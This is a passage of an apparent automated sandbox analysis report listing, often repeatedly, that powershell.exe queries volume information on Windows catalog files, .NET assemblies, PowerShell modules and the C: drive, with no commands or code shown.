                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
